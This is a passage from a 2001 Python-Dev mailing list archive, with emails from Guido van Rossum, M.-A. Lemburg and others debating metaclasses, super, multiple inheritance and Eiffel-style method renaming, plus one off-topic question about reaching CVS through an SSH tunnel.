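secret = codecs.encode('Hello, World!', 'toy_rot13')
```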

I think I'll repost it to c.l.p though -- with a new secret 
attached to it ;-)



From guido@digicool.com  Thu May  3 15:26:22 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 09:26:22 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Thu, 03 May 2001 09:49:37 +0200."
 <3AF10D91.802C8555@lemburg.com>
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>
 <3AF10D91.802C8555@lemburg.com>
Message-ID: <200105031426.JAA07372@cj20424-a.reston1.va.home.com>

> We are actually trying to turn classes into types here :-)

Yes!  Wait till you see my next batch of checkins. :-)

> Really, I think that we could resolve this issue by not inheriting
> from meta-classes. DictType is a creation of the meta-class
> TypeType. I'm not calling these instances to prevent additional
> confusion. The root of the problem is that for some reason there
> is a belief that DictType should implicitly inherit attributes and 
> methods from TypeType. If we simply say that there is no implicit
> inheritance (only explicit one), then these problems should go
> away.

Sorry, you still seem to be confused about this.  As I tried to
explain before, DictType does not *inherit* from TypeType, but it is
an *instance* of TypeType.  TypeType defines a __repr__() method for
all its instances.  This is needed so that repr(DictType) returns
"<type 'DictType'>".  It is *not* inherited from TypeType!

If DictType were to inherit from something, it would inherit from the
(not yet existing) ObjectType.  ObjectType would have a __repr__
method too: it returns "<foo object at 0x......>".

But this method is overridden by DictType, so it doesn't come into play.

Requiring explicit inheritance (whatever that may be) won't fix the
problem.

> Some of these ideas are buried in the "super" part of this 
> thread. Unfortunately this concept doesn't go very far since
> Python has multiple inheritance and thus the term "super"
> (referring to the class' single base class) is not well-defined.

Not true.  While super can't always refer to a single class, the use
of super can be completely well-defined in an unambiguous way.  Given

  class D(A, B, C):
    def foo(self):
      super.foo(self)

"super.foo" is whatever would be called in D1 if we changed the class
hierarchy as follows:

  class D1(A, B, C): pass
  class D(D1):
    def foo(self):
      D1.foo(self)
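Guido's equivalence can be checked in Python 3 with zero-argument super(). The sketch below assumes A does not define foo, so both spellings land on B.foo:

```python
class A:
    pass                     # A does not define foo

class B:
    def foo(self):
        return 'B.foo'

class C:
    def foo(self):
        return 'C.foo'

# Guido's construction: same bases as D, but no foo of its own.
class D1(A, B, C):
    pass

class D(A, B, C):
    def foo(self):
        # Zero-argument super() searches type(self).__mro__ after D.
        return 'D.foo -> ' + super().foo()

# super() inside D.foo finds the same function that D1.foo resolves to.
same_function = super(D, D()).foo.__func__ is D1.foo
```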

The problem with super is not that it isn't well-defined.  Its problem
is that it's not enough to do what you want.  In some situations
involving multiple inheritance, it can be essential to be able to
"merge" methods of the same name defined in each of the base classes,
e.g.

  class C(A, B):
    def save(self):
      A.save(self)
      B.save(self)

So we can't use super as an argument to abandon explicitly naming the
base class of base methods.  Out of the proposed spellings that I can
remember:

      B.save(self)			# current Python
      B.__dict__['save'](self)		# ditto, butt ugly
      B::save(self)			# C++
      B._.save(self)			# Don Beaudry
      B.instanceMethods.save(self)	# ???

I still like current Python best!
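A runnable Python 3 version of the save example follows. It adds a second class, SuperOnly (a hypothetical name), that tries to get by with a single super() call. Since A.save does not itself call super(), only A's method runs, which is the limitation described above:

```python
class A:
    def save(self, log):
        log.append('A.save')

class B:
    def save(self, log):
        log.append('B.save')

class C(A, B):
    def save(self, log):
        # Merge both base implementations by naming each base explicitly.
        A.save(self, log)
        B.save(self, log)

class SuperOnly(A, B):
    def save(self, log):
        # One super() call reaches only A.save; because A.save does not call
        # super() itself, B.save is never reached.
        super().save(log)

merged = []
C().save(merged)

via_super = []
SuperOnly().save(via_super)

# In Python 3 the B.__dict__['save'](self) spelling names the same plain function.
same_function = B.__dict__['save'] is B.save
```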

> As Jim mentioned in his reply to Thomas' question, Smalltalk
> has two parallel hierarchies. One for the classes and one for
> the meta-classes. If we follow the same path in Python and
> keep the two well separated, I think we can resolve many of
> the issues which are currently showing up.

Yeah, but this is not the path that Python has already taken (and
which has been beaten further by Jim Fulton's ExtensionClasses).
Python's path is "turtles all the way down".  See also my old
head-exploding metaclasses paper.

> To link the two hierarchies together we don't need a "super"
> concept, but instead a way to reach the meta-class in charge
> of a class, say "klass.__creator__". 

Your confusion between the "isInstanceOf" and "isInheritedFrom"
relationships seems really deep!  Super relates to inheritance.
Metaclasses relate to instantiation (of the class, as an instance of
the metaclass).
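The two relationships map onto isinstance() and issubclass() in Python 3, and type(klass) plays the part of the proposed klass.__creator__. A short check, using dict in place of DictType:

```python
# Instantiation: dict is an instance of the metaclass type.
assert isinstance(dict, type)
assert type(dict) is type          # the meta-class "in charge" of dict

# Inheritance: dict is a subclass of object, not of type.
assert issubclass(dict, object)
assert not issubclass(dict, type)

# repr(dict) therefore comes from type (instantiation), while repr({}) comes
# from dict itself, which overrides object.__repr__ (inheritance).
assert dict.__repr__ is not object.__repr__
assert repr({}) == '{}'
assert object.__repr__(object()).startswith('<object object at ')
```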

> Note that there's another issue hiding in all this and again
> this is due to multiple inheritance: which meta-class is in
> charge of a class which is derived from two classes having
> different meta-classes ?
> 
> meta1            -->         o klass1
>                                o klass1a
>                                o klass1b
> meta2            -->         o klass2
>                                o klass2a
>                                o klass2b
> 
> class klass3(klass1a, klass2b):
>       ...                  
> 
> I think there's no clean way to resolve this, so I'd suggest
> to simply rule this out and declare it illegal (class can
> only be based on classes having the same meta-class).

Unfortunately, again thanks to Jim Fulton, we can't rule this out,
because this is actually used by ExtensionClasses.  The rule (as I
interpret it) gives the first base class control; if the first base
class is a standard class, it checks whether any of the other base classes
are not standard classes, and if so, gives control to the first such
base class.  Another way to say this is that the first base class that
has a non-standard metaclass gets control.
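For comparison, Python 3 adopted a different rule from the ExtensionClasses one. There, the most derived metaclass among the bases takes control, and unrelated metaclasses are rejected unless a common subclass is supplied. When only one base has a non-standard metaclass, the two rules agree. A sketch with made-up metaclass names:

```python
class Meta1(type):
    pass

class Meta2(type):
    pass

class Klass1(metaclass=Meta1):
    pass

class Klass2(metaclass=Meta2):
    pass

class Plain:                       # a standard class; its metaclass is type
    pass

# A standard base plus a Meta1 base: the more specific metaclass takes control.
class Mixed(Plain, Klass1):
    pass

# Two unrelated metaclasses: Python 3 refuses to pick one.
try:
    class Klass3(Klass1, Klass2):
        pass
except TypeError as exc:
    conflict = str(exc)
else:
    conflict = None

# Supplying a metaclass derived from both resolves the conflict.
class Meta3(Meta1, Meta2):
    pass

class Klass3(Klass1, Klass2, metaclass=Meta3):
    pass
```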

(ExtensionClasses implements an additional rule where it requires all
except one of the base classes to define no instance variables.  This
is an example of the importance of metaclasses done right: the
metaclass has control over such issues.  I don't think that
Smalltalk's metaclasses have this much control -- you pretty much have
a 1-1 correspondence between class and metaclass.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Thu May  3 15:28:03 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 09:28:03 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Thu, 03 May 2001 15:27:34 +1200."
 <200105030327.PAA16472@s454.cosc.canterbury.ac.nz>
References: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz>
Message-ID: <200105031428.JAA07405@cj20424-a.reston1.va.home.com>

> Guido:
> 
> > Actually, I think that what's in the __dict__ is just perfect
> 
> I was thinking of backwards compatibility for people who
> are hacking the __dict__ of a class directly.

Depending on how they hack it, it may still work.

> If you don't care about that, the problem is simpler.
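Here is how direct __dict__ hacking fared in Python 3. Reading a class's __dict__ still works, but it is a read-only mappingproxy. Code that assigns into it breaks, while setattr() keeps working. A small check (the class Spam is illustrative):

```python
import types

class Spam:
    eggs = 1

# Reading the class __dict__ still works.
assert Spam.__dict__['eggs'] == 1
assert isinstance(Spam.__dict__, types.MappingProxyType)

# Writing through it does not: the mapping is a read-only proxy.
try:
    Spam.__dict__['eggs'] = 2
except TypeError:
    direct_write_failed = True
else:
    direct_write_failed = False

# setattr() is the supported route for changing a class attribute.
setattr(Spam, 'eggs', 2)
```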



From skip@pobox.com (Skip Montanaro)  Thu May  3 15:26:51 2001
From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro))
Date: Thu, 3 May 2001 09:26:51 -0500
Subject: [Python-Dev] OT: CVS access through firewall via SSH
Message-ID: <15089.27307.136251.862692@beluga.mojam.com>

Python-dev folks,

Sorry for the off-topic post, but I'm striking out on the various other
sources I've located so far.  Since this group seemed to have a love-hate
relationship with CVS for a while, I thought maybe someone here would be able
to steer me in the right direction.

I have to access a CVS repository through a firewall via SSH.  That is, to
get to "server" I have to tunnel through "firewall" using SSH to port "nnn".
Using SSH to establish an interactive session to server is no problem:

    ssh -p nnn firewall

When I'm inside the firewall, I use a CVSROOT that looks like

    :pserver:montanaro@server:/cvs/projects

I need to merge the two bits somehow to come up with a CVSROOT that will do
the tunnel automagically.  I've tried this:

    :pserver:montanaro@firewall:nnn/cvs/projects

but CVS complains

    cvs [update aborted]: connect to firewall:2401 failed: Connection refused

(port 2401 is the normal CVS port).

Any suggestions or pointers?

Thanks,

Skip


From mal@lemburg.com  Thu May  3 17:08:30 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 18:08:30 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>
 <3AF10D91.802C8555@lemburg.com> <200105031426.JAA07372@cj20424-a.reston1.va.home.com>
Message-ID: <3AF1827E.E730F5DE@lemburg.com>

Guido van Rossum wrote:
> 
> > We are actually trying to turn classes into types here :-)
> 
> Yes!  Wait till you see my next batch of checkins. :-)

Looking forward to them :) 

BTW, can you give a good starting point into all this (code-wise
and concept-wise)? I'd like to play around with these new concepts
a little to get a better feeling for the possible issues (I should
have done the same for the coercion stuff a year ago: implementing
mxNumber I now find that some important hooks are missing :-().
 
> > Really, I think that we could resolve this issue by not inheriting
> > from meta-classes. DictType is a creation of the meta-class
> > TypeType. I'm not calling these instances to prevent additional
> > confusion. The root of the problem is that for some reason there
> > is a belief that DictType should implicitly inherit attributes and
> > methods from TypeType. If we simply say that there is no implicit
> > inheritance (only explicit one), then these problems should go
> > away.
> 
> Sorry, you still seem to be confused about this. 

I think it has to do with terminology: when I say "inherit"
I actually mean "the lookup is forwarded to another object".

In that sense, instances inherit from their classes and 
classes from their base-classes:

meta-class M ->        o base-class A
                         o class B
                           o instance x = B()  

Meta-class M controls this "inheritance scheme" and can modify
it depending on its needs. 

Here's a scenario of what I have in mind:

In the above picture, say A defines an attribute A.a which is not 
defined in B or as instance attribute of B(). Querying x.a would then 
launch this process:

1. x.a -> fails
2. M.__findattr__(x, 'a') is called to find and return the
   attribute
3. M.__findattr__ asks B for an attribute 'a' -> fails
4. M.__findattr__ asks A for an attribute 'a' -> success
5. M.__findattr__ returns the found attribute

I know that this is somewhat different under the covers than
what's happening now, but the Python programmer will not notice
this. It most probably does not work well with the Don Beaudry
hook though... so maybe I'm simply on the wrong track here.
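The lookup steps above can be modelled with ordinary Python objects. This is a toy simulation, not how CPython looks attributes up. Meta.findattr stands in for the proposed M.__findattr__, and Klass and Instance are hypothetical stand-ins for classes and instances. The second meta-object shows a meta-class changing the scheme, in this case by refusing to look past the instance's own class:

```python
class Meta:
    """Toy meta-object; findattr() stands in for the proposed M.__findattr__."""
    def findattr(self, inst, name):
        klass = inst.klass
        while klass is not None:             # steps 3 and 4: B, then A, ...
            if name in klass.attrs:
                return klass.attrs[name]     # step 5: return what was found
            klass = klass.base
        raise AttributeError(name)


class NoInheritMeta(Meta):
    """A meta-object with a different scheme: only the instance's own class counts."""
    def findattr(self, inst, name):
        if name in inst.klass.attrs:
            return inst.klass.attrs[name]
        raise AttributeError(name)


class Klass:
    """Hypothetical class record: its meta-object, one base, and its attributes."""
    def __init__(self, meta, base=None, **attrs):
        self.meta, self.base, self.attrs = meta, base, attrs


class Instance:
    def __init__(self, klass):
        self.klass, self.attrs = klass, {}

    def lookup(self, name):
        if name in self.attrs:                       # step 1: the instance itself
            return self.attrs[name]
        return self.klass.meta.findattr(self, name)  # step 2: ask the meta-object


m = Meta()
A = Klass(m, a='from A')
B = Klass(m, base=A)
x = Instance(B)
found = x.lookup('a')                 # B lacks 'a', so the search reaches A

B_strict = Klass(NoInheritMeta(), base=A)
try:
    Instance(B_strict).lookup('a')
except AttributeError:
    strict_found = False
else:
    strict_found = True
```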

> As I tried to
> explain before, DictType does not *inherit* from TypeType, but it is
> an *instance* of TypeType.  TypeType defines a __repr__() method for
> all its instances.  This is needed so that repr(DictType) returns
> "<type 'DictType'>".  It is *not* inherited from TypeType!
> 
> If DictType were to inherit from something, it would inherit from the
> (not yet existing) ObjectType.  ObjectType would have a __repr__
> method too: it returns "<foo object at 0x......>".
> 
> But this method is overridden by DictType, so it doesn't come into play.
> 
> Requiring explicit inheritance (whatever that may be) won't fix the
> problem.

With "explicit inheritance" I meant that the programmer has to
take care of passing the lookup on to the meta-class, rather
than applying some magic which hooks together class and meta-
class.
 
> > Some of these ideas are buried in the "super" part of this
> > thread. Unfortunately this concept doesn't go very far since
> > Python has multiple inheritance and thus the term "super"
> > (referring to the class' single base class) is not well-defined.
> 
> Not true.  While super can't always refer to a single class, the use
> of super can be completely well-defined in an unambiguous way.  Given
> 
>   class D(A, B, C):
>     def foo(self):
>       super.foo(self)
> 
> "super.foo" is whatever would be called in D1 if we changed the class
> hierarchy as follows:
> 
>   class D1(A, B, C): pass
>   class D(D1):
>     def foo(self):
>       D1.foo(self)

Nice trick -- much like the "+0" trick in math ;-)

> The problem with super is not that it isn't well-defined.  Its problem
> is that it's not enough to do what you want.  In some situations
> involving multiple inheritance, it can be essential to be able to
> "merge" methods of the same name defined in each of the base classes,
> e.g.
> 
>   class C(A, B):
>     def save(self):
>       A.save(self)
>       B.save(self)
> 
> So we can't use super as an argument to abandon explicitly naming the
> base class of base methods.  Out of the proposed spellings that I can
> remember:
> 
>       B.save(self)                      # current Python
>       B.__dict__['save'](self)          # ditto, butt ugly
>       B::save(self)                     # C++
>       B._.save(self)                    # Don Beaudry
>       B.instanceMethods.save(self)      # ???
> 
> I still like current Python best!

But it doesn't help us in the very common case of mixin classes,
since there neither the mixin's method nor, sometimes, even its
programmer knows where the base method to call lives. This is why I
wrote the basemethod() helper: it looks up the right method
at run-time and thus allows writing mixin-classes which override
methods of other classes which are only known to the programmer
using the mixin and not necessarily to the one writing the mixin.
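The basemethod() helper itself isn't shown in the thread, so this does not reproduce its API. For comparison, Python 3's cooperative super() addresses the same mixin case. The next method is found at run time from type(self).__mro__, so the mixin author never names the base class. All class names are illustrative:

```python
class Storage:
    def save(self, log):
        log.append('Storage.save')

class Cache:
    def save(self, log):
        log.append('Cache.save')

class LoggingMixin:
    # The mixin's author does not know which class follows it in the MRO.
    def save(self, log):
        log.append('LoggingMixin.save')
        super().save(log)

# The class that combines the pieces decides where super() leads.
class Document(LoggingMixin, Storage):
    pass

class CachedDocument(LoggingMixin, Cache):
    pass

doc_log = []
Document().save(doc_log)

cached_log = []
CachedDocument().save(cached_log)
```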
 
> > As Jim mentioned in his reply to Thomas' question, Smalltalk
> > has two parallel hierarchies. One for the classes and one for
> > the meta-classes. If we follow the same path in Python and
> > keep the two well separated, I think we can resolve many of
> > the issues which are currently showing up.
> 
> Yeah, but this is not the path that Python has already taken (and
> which has been beaten further by Jim Fulton's ExtensionClasses).
> Python's path is "turtles all the way down".  See also my old
> head-exploding metaclasses paper.

I know... I was under the impression, though, that a little
breakage under the covers is allowed when moving from type/classes
to all types.
 
> > To link the two hierarchies together we don't need a "super"
> > concept, but instead a way to reach the meta-class in charge
> > of a class, say "klass.__creator__".
> 
> Your confusion between the "isInstanceOf" and "isInheritedFrom"
> relationships seems really deep!  Super relates to inheritance.
> Metaclasses relate to instantiation (of the class, as an instance of
> the metaclass).

See above... I don't like implicitly binding creation of objects
with lookup paths. These two concepts don't belong together, IMHO,
since they introduce restrictions which are not really necessary.
(I have had some great experiences with loosely coupled object
systems and don't want to give up their flexibility.)

> > Note that there's another issue hiding in all this and again
> > this is due to multiple inheritance: which meta-class is in
> > charge of a class which is derived from two classes having
> > different meta-classes ?
> >
> > meta1            -->         o klass1
> >                                o klass1a
> >                                o klass1b
> > meta2            -->         o klass2
> >                                o klass2a
> >                                o klass2b
> >
> > class klass3(klass1a, klass2b):
> >       ...
> >
> > I think there's no clean way to resolve this, so I'd suggest
> > to simply rule this out and declare it illegal (class can
> > only be based on classes having the same meta-class).
> 
> Unfortunately, again thanks to Jim Fulton, we can't rule this out,
> because this is actually used by ExtensionClasses.  The rule (as I
> interpret it) gives the first base class control; if the first base
> class is a standard class, it checks whether any of the other base classes
> are not standard classes, and if so, gives control to the first such
> base class.  Another way to say this is that the first base class that
> has a non-standard metaclass gets control.

Ouch. Still, since Jim's in control of ExtensionClass -- wouldn't
it be possible to adapt ExtensionClass to an altered scheme ?

> (ExtensionClasses implements an additional rule where it requires all
> except one of the base classes to define no instance variables.  This
> is an example of the importance of metaclasses done right: the
> metaclass has control over such issues.  I don't think that
> Smalltalk's metaclasses have this much control -- you pretty much have
> a 1-1 correspondence between class and metaclass.

Right: more power to the meta-class :-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From paul@pfdubois.com  Thu May  3 17:24:40 2001
From: paul@pfdubois.com (Paul F. Dubois)
Date: Thu, 3 May 2001 09:24:40 -0700
Subject: [Python-Dev] Multiple inheritance
Message-ID: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>

Pardon if this is brief and suggestive only, I am on deadlines.

Super is a mistaken concept in multiple inheritance languages. Fortunately,
Python is not brain-damaged. Its multiple inheritance model can be fixed
easily to be fully capable.

Here is a suggestive example of implementing the Eiffel model (the only one
that is theoretically sound) using "pretend" Python syntax (keyword
conservationists might like "import" where I have "rename"):


1. The simple case, X inherits from Y and in defining foo and bar needs to
use Y's version:

class X (Y rename foo as _sfoo,
                  bar as _sbar
        ):
    def foo (self):
        self._sfoo()
        myfoostuff

Suppose D inherits from B and C, which both inherit from A.
A has a method a1 that is redefined in B but not in C.
D wishes to use both A's version as inherited via C and B's version.

class D (B rename a1 as ba1, C rename a1 as ca1):

     can now use self.ca1, self.a1

Renaming is also useful where you inherit from a utility class and the lingo
is different in the class where you want to use it. E.g. class Window (Tree
rename children as subWindows)

Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition.
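In present-day Python, the diamond case can be approximated without new syntax by binding the base-class functions to new names in the class body. This is only a sketch. Unlike the proposed `rename`, it does not hide the original name `a1`, which still resolves through the method resolution order (here to B's version).

```python
class A:
    def a1(self):
        return "A.a1"

class B(A):
    def a1(self):  # B redefines a1
        return "B.a1"

class C(A):
    pass  # C inherits A.a1 unchanged

class D(B, C):
    # Hand-written stand-in for "B rename a1 as ba1, C rename a1 as ca1".
    ba1 = B.a1  # B's version
    ca1 = C.a1  # resolves through C to A's version
```

Here `D().ba1()` returns `"B.a1"` and `D().ca1()` returns `"A.a1"`, while plain `D().a1()` still finds B's version first.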


From Donald Beaudry <donb@abinitio.com>  Thu May  3 17:47:29 2001
From: Donald Beaudry <donb@abinitio.com> (Donald Beaudry)
Date: Thu, 03 May 2001 12:47:29 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>
Message-ID: <200105031647.MAA25803@localhost.localdomain>

"Tim Peters" <tim.one@home.com> wrote,
> Given that we're using Python's search rules, the ambiguous point remaining
> is whether:
> 
>     super.f()
> 
> textually contained in a method of class K begins searching with:
> 
>     1) K.__bases__
> 
> or with:
> 
>     2) self.__class__.__bases__

It can only be 1.  Using 2 will only be correct if you are in a
method defined on a leaf class.  If not in a leaf, the search will
find the method you are already in... recursion is likely to terminate
in a stack overflow ;)
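Here is a small sketch of the two options in present-day Python. For simplicity, it uses only the first base class. `B1` starts the search at the bases of the textually enclosing class (option 1). `B2` starts at `self.__class__.__bases__` (option 2). Option 2 works on a leaf-class instance (`B2()`). On an instance of a subclass (`C2()`), it finds `B2.f` again and recurses until Python raises RecursionError.

```python
class A:
    def f(self):
        return ["A"]

class B1(A):
    def f(self):
        # Option 1: the search starts at the bases of B1, the class that
        # textually contains this method.
        return ["B1"] + B1.__bases__[0].f(self)

class C1(B1):
    pass

class B2(A):
    def f(self):
        # Option 2: the search starts at the bases of the instance's class.
        return ["B2"] + self.__class__.__bases__[0].f(self)

class C2(B2):
    pass

def option2_overflows():
    # On a C2 instance, option 2 finds B2.f again and never reaches A.
    try:
        C2().f()
    except RecursionError:
        return True
    return False
```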

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb@init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From guido@digicool.com  Thu May  3 19:48:19 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 14:48:19 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
 <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <200105031848.f43ImKg14308@odiug.digicool.com>


From guido@digicool.com  Thu May  3 19:50:30 2001
From: guido@digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 14:50:30 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
 <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <200105031850.f43IoVf14328@odiug.digicool.com>

> Pardon if this is brief and suggestive only, I am on deadlines.

No problem.  We appreciate it!

> Super is a mistaken concept in multiple inheritance languages. Fortunately,
> Python is not brain-damaged. Its multiple inheritance model can be fixed
> easily to be fully capable.
> 
> Here is a suggestive example of implementing the Eiffel model (the only one
> that is theoretically sound) using "pretend" Python syntax (keyword
> conservationists might like "import" where I have "rename"):
> 
> 
> 1. The simple case, X inherits from Y and in defining foo and bar needs to
> use Y's version:
> 
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):
>     def foo (self):
>         self._sfoo()
>         myfoostuff

Nice!  This is similar to Jeremy's favorite way of spelling "super":

class X(Y):
    Yfoo = Y.foo
    def foo(self):
        self.Yfoo()
        myfoostuff

> Suppose D inherits from B and C, which both inherit from A.
> A has a method a1 that is redefined in B but not in C.
> D wishes to use both A's version as inherited via C and B's version.
> 
> class D (B rename a1 as ba1, C rename a1 as ca1):
> 
>      can now use self.ca1, self.a1
> 
> Renaming is also useful where you inherit from a utility class and the lingo
> is different in the class where you want to use it. E.g. class Window (Tree
> rename children as subWindows)
> 
> Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition.

Yes.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jepler@inetnebr.com  Thu May  3 19:17:16 2001
From: jepler@inetnebr.com (Jeff Epler)
Date: Thu, 3 May 2001 13:17:16 -0500
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <20010503131714.D21814@inetnebr.com>

On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):

Why not let us spell this as:
	class X(Y):
		from Y import foo as _sfoo, bar as _sbar
		...

Of course, then you can spell inheritance as
	class X:
		from Y import *
Right?  :)

Jeff


From nas@python.ca  Thu May  3 20:05:37 2001
From: nas@python.ca (Neil Schemenauer)
Date: Thu, 3 May 2001 12:05:37 -0700
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <20010503131714.D21814@inetnebr.com>; from jepler@inetnebr.com on Thu, May 03, 2001 at 01:17:16PM -0500
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com>
Message-ID: <20010503120537.A13708@glacier.fnational.com>

Jeff Epler wrote:
> On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> > class X (Y rename foo as _sfoo,
> >                   bar as _sbar
> >         ):
> 
> Why not let us spell this as:
> 	class X(Y):
> 		from Y import foo as _sfoo, bar as _sbar
> 		...

This already has a meaning in Python.  Paul's suggested syntax is
pretty neat, IMHO.

  Neil


From trentm@ActiveState.com  Thu May  3 20:39:27 2001
From: trentm@ActiveState.com (Trent Mick)
Date: Thu, 3 May 2001 12:39:27 -0700
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <20010503120537.A13708@glacier.fnational.com>; from nas@python.ca on Thu, May 03, 2001 at 12:05:37PM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com> <20010503120537.A13708@glacier.fnational.com>
Message-ID: <20010503123927.B30837@ActiveState.com>

On Thu, May 03, 2001 at 12:05:37PM -0700, Neil Schemenauer wrote:
> Jeff Epler wrote:
> > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> > > class X (Y rename foo as _sfoo,
> > >                   bar as _sbar
> > >         ):
> > 
> > Why not let us spell this as:
> > 	class X(Y):
> > 		from Y import foo as _sfoo, bar as _sbar
> > 		...
> 
> This already has a meaning in Python.  Paul's suggested syntax is
> pretty neat, IMHO.

Ditto, but how do you separate the "rename" lists for multiple inheritance?

    class X (Y rename foo as _sfoo, bar as _sbar; Z):
                                                ^---- what to use here
        pass

How about:

    class X(Y, Z):
        from Y inherit foo as _yfoo, bar as _ybar
        from Z inherit foo as _zfoo, bar as _zbar


Hmmmmm. Don't know if I like that either. Just throwing out ideas.

Trent

-- 
Trent Mick
TrentM@ActiveState.com


From greg@cosc.canterbury.ac.nz  Fri May  4 05:25:08 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 04 May 2001 16:25:08 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AF1827E.E730F5DE@lemburg.com>
Message-ID: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal@lemburg.com>:

> I think it has to do with terminology: when I say "inherit"
> I actually mean "the lookup is forwarded to another object".

Some OO languages munge together the instance and inheritance
relationships, but Python isn't one of them. Using terminology
that way in the context of Python is guaranteed to cause
massive confusion!

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Fri May  4 05:58:20 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 04 May 2001 16:58:20 +1200 (NZST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <m14vCbn-000D2zC@artcom0.artcom-gmbh.de>
Message-ID: <200105040458.QAA16653@s454.cosc.canterbury.ac.nz>

pf@artcom-gmbh.de (Peter Funk):

> * People will confuse this with calling
> MyBaseClass.__getitem__(....)

Given type/class/instance unification, that's exactly how it'll
be implemented. So it's not confusion, it's insightful understanding!

> This '::' operator is not at all that ugly

Well, that's a matter of opinion. But I'll concede that it's
less ugly than something like @ or $.

But in any case, it's not going to mean quite the same thing
in Python as it does in C++, so it might just confuse C++
people.

What exactly *is* it going to mean in Python, anyway?
Will it have a corresponding __magic__ method, and if so,
what will it be called?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From mal@lemburg.com  Fri May  4 09:40:17 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 10:40:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF26AF1.780462E2@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal@lemburg.com>:
> 
> > I think it has to do with terminology: when I say "inherit"
> > I actually mean "the lookup is forwarded to another object".
> 
> Some OO languages munge together the instance and inheritance
> relationships, but Python isn't one of them. Using terminology
> that way in the context of Python is guaranteed to cause
> massive confusion!

But that's exactly what I am trying to do here: separate the
notion of how lookups work (inheritance) from how objects are 
created (instantiation) !

In Python instantiation binds the new object to the creating
class and all failing lookups are directed from the object to
the class. 

OTOH, the class - base-class lookup relationship 
doesn't have anything to do with the creation of objects -- classes
are simply bound to their base-classes per definition of the
class in the sense that failing lookups are directed to the
base-classes.

Classes themselves are created by meta-classes. The lookup
strategy between the two is defined by the meta-class.

What I'm arguing for is that meta-classes should get complete
control over how lookups and object creation are done. However,
this will only be possible by breaking the current automatic
lookup scheme at the meta-class - class boundary since otherwise
you'd run into endless loops during lookups (e.g. for many of
the __xxx__ methods).
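For illustration only: the new-style class model that Python later adopted keeps the two lookup chains MAL distinguishes apart. A failing attribute lookup on a class falls through to its metaclass. A failing lookup on an instance goes only to its class and that class's bases, never to the metaclass. The names `Meta` and `K` are hypothetical.

```python
class Meta(type):
    # An attribute defined only on the metaclass.
    greeting = "hello from Meta"

class K(metaclass=Meta):
    pass

def lookup_from_class():
    # Class -> metaclass: the lookup on K falls through to Meta.
    return K.greeting

def lookup_from_instance():
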